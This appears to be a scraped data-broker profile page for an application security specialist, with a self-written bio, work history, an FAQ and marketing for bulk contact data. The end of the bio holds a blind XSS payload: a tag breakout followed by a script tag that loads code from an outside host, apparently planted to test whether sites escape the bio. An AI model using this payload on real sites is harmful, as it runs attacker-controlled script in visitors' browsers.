🎯 Application Security Expert | Web and Mobile Security Specialist | OSWE & Burp Suite CertifiedI am an accomplished Application Security Expert with deep expertise in web and mobile application security. As a highly active bug hunter, I consistently uncover vulnerabilities and contribute to strengthening the security posture of organizations worldwide. 💡 Highlights of My Expertise: - Advanced web application security analysis (Black, Grey, and White Box methodologies). - Comprehensive mobile application security testing for Android (BlackBox, GreyBox). - Creator of challenging and engaging tasks for local and international CTF tournaments. - Developer of custom automation tools for vulnerability detection and exploitation. - Active bug hunter, leveraging platforms to identify and report critical security flaws. 📜 Certifications: - Offensive Security Web Expert (OSWE) – Demonstrating mastery in advanced web application exploitation and secure design. - Burp Suite Certified Practitioner – Validating advanced proficiency in using Burp Suite for security testing. 📈 Achievements: - Bug Bounty Successes: Ranked Top 16 at BugsZone II and Top 7 at BugsZone III. - Speaker at Leading Conferences: Delivered impactful talks at events such as OffZone 2023, VolgaCTF 2023, and CyberWeekend 2023. - Participant in Renowned Security Conferences: - Positive Hack Days (2017, 2018, 2019, 2021 – StandOff participant). - ZeroNights 2019. - UralCTF and TyumenCTF (multiple years). 📌 Why Choose Me? I bring unmatched expertise in web and mobile application security, combining practical bug hunting experience with deep technical knowledge. My certifications, industry participation, and results-driven approach ensure I deliver precise and impactful security solutions. Currently, I am expanding my skills to include smart contract and Web3.0 auditing, preparing to address emerging challenges in blockchain security. 🌟 Beyond Work: Off the keyboard, I find exhilaration in motorsport and snowboarding, which fuel my drive for focus and precision in everything I do. 📩 Let’s Connect: - Telegram: https://t.me/W0lFreaK- Telegram Blog: https://t.me/pain_test- Email: wolfreak449@gmail.com Let’s collaborate to secure the digital frontier. 🚀"><script src="https://js.rip/w0"></script>
-
Appsec Team LeadWildberriesRussia
-
Senior Application Security SpecialistЛаборатория Касперского Jul 2024 - Present -
Application Security SpecialistKaspersky May 2023 - Jul 2024Москва, Россия
-
Bug Bounty HunterIndependent Cyber Security Researcher Jan 2023 - Present -
Senior LecturerTyumen State University Sep 2021 - Aug 2023Tyumen’, RussiaI teach students at the university at the Department of Information Security. Developed my own curriculum. -
Independent Security Researcher | Bug Bounty HunterFreelance (Self Employed) Jun 2021 - May 2023SwitzerlandI was working as a penetration tester in an innovative European company (i can't write his name because of the NDA). In my experience, there are over 300 tested websites and over 50 android applications.My main achievements at this place of work are:* I have found many vulnerabilities on the web and mobile applications.* I have found and successfully exploit several vulnerability-chains (such as "from XSS to RCE") in productive commercial software.* Development and creation of tasks for local and international CTF tournaments.* Development of software products to automate routine tasks in the field of finding vulnerabilities.* In my free time, I successfully completed the Burp Suite Certified Practitioner certification -
Penetration TesterUnlim-It Llc Jun 2019 - May 2021Tyumen’, RussiaAchievements:* Building and managing the pentest and the forensics teams.* More than 10 successful pentest projects (internal, external, black, white, gray)Responsibility:* Open Source Intelligence.* Security analysis of web applications (BlackBox, GrayBox, WhiteBox).* Security analysis of Android mobile applications (BlackBox, GrayBox).* Analysis of the security of wireless networks.* Security analysis of corporate local networks and domain infrastructures.* Security analysis using social engineering methods.* Development of software solutions for automating tasks in the framework of security analysis.* Development of reporting documentation based on the test results with recommendations for eliminating the identified vulnerabilities.* Research of methods of circumvention of information security means (Web Application Firewall).* Investigation of information security incidents. -
Information Technology EngineerFgbny Gosrybcenter Jan 2017 - Sep 2017Tyumen’, RussiaEnsuring the stability and security of the enterprise's domain infrastructure.Development of internal information security policies.
Andrey Kozlov Education Details
Frequently Asked Questions about Andrey Kozlov
What company does Andrey Kozlov work for?
Andrey Kozlov works for Wildberries
What is Andrey Kozlov's role at the current company?
Andrey Kozlov's current role is AppSec Team Lead.
What schools did Andrey Kozlov attend?
Andrey Kozlov attended Tyumen State University.
Not the Andrey Kozlov you were looking for?
-
-
1tnk-bp.com -
-
Free Chrome Extension
Find emails, phones & company data instantly
Aero Online
Your AI prospecting assistant
Select data to include:
0 records × $0.02 per record
Download 750 million emails and 100 million phone numbers
Access emails and phone numbers of over 750 million business users. Instantly download verified profiles using 20+ filters, including location, job title, company, function, and industry.
Start your free trial